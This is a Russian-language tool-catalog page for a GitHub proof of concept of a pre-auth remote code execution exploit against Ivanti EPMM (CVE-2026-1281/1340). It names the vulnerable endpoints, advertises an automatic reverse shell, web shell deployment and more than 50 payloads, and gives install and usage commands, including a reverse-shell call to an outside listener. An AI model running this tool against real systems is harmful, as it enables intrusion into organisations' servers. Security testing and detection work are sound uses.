Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — # PoC для CVE-2026-1281 и CVE-2026-1340 — Ivanti EPMM Pre-Auth RCE через арифметическое расширение Bash | Kitploit
Инструменты/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

# PoC для CVE-2026-1281 и CVE-2026-1340 — Ivanti EPMM Pre-Auth RCE через арифметическое расширение Bash

Репозиторий
616 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1281 и CVE-2026-1340 — Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данный PoC предоставляется исключительно в образовательных целях и для исследований в области безопасности. Использование без явного разрешения незаконно.

🎯 Описание

Полный Proof of Concept (PoC) для эксплуатации уязвимостей CVE-2026-1281 и CVE-2026-1340, затрагивающих Ivanti Endpoint Manager Mobile (EPMM). Эти уязвимости позволяют выполнять произвольный код удалённо (RCE) без аутентификации через механизм Bash Arithmetic Expansion.

Уязвимости

  • CVE-2026-1281 : Инъекция кода в конечной точке /mifs/c/appstore/fob/
  • CVE-2026-1340 : Инъекция кода в конечной точке
/mifs/c/aftstore/fob/
  • Оценка CVSS : 9.8 (Critical)
  • Эксплуатация : Активная эксплуатация in-the-wild (Zero-Day)
  • 🚀 Возможности

    • ✅ Автоматизированная система валидации (8 тестов)
    • ✅ Эксплуатация Pre-Auth RCE
    • ✅ Автоматический reverse shell
    • ✅ Развёртывание веб-шелла
    • ✅ 50+ готовых payload-ов
    • ✅ Скрипты обнаружения для Blue Team
    • ✅ Полная документация

    📦 Установка

    root@kitploit:~
    git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
    cd CVE-2026-1281-Ivanti-EPMM-RCE
    pip3 install -r requirements.txt
    chmod +x *.py
    

    🎯 Быстрое использование

    root@kitploit:~
    # Проверка уязвимости
    python3 exploit.py -t https://target.com -c
    
    # Проверка RCE
    python3 exploit.py -t https://target.com --test-rce
    
    # Reverse shell
    python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
    

    📚 Документация

    • Полный README — Подробная техническая документация
    • Руководство по использованию — Пошаговое руководство
    • Payload-ы — Коллекция из 50+ payload-ов
    • Руководство Red Team — Операционные сценарии

    🔗 Ссылки

    • CERT-FR CERTFR-2026-ALE-001
    • Анализ Watchtowr Labs
    • CVE-2026-1281
    • CVE-2026-1340

    👤 Автор

    Mehdi Le Deaut — Консультант по кибербезопасности | Специалист Red Team

    LinkedIn

    ⚖️ Лицензия

    Этот проект распространяется под лицензией MIT — см. файл LICENSE для получения подробной информации.

    🙏 Благодарности

    • CERT-FR за оперативное предупреждение
    • Watchtowr Labs за технический анализ
    • Сообществу специалистов по кибербезопасности
    Скачать инструмент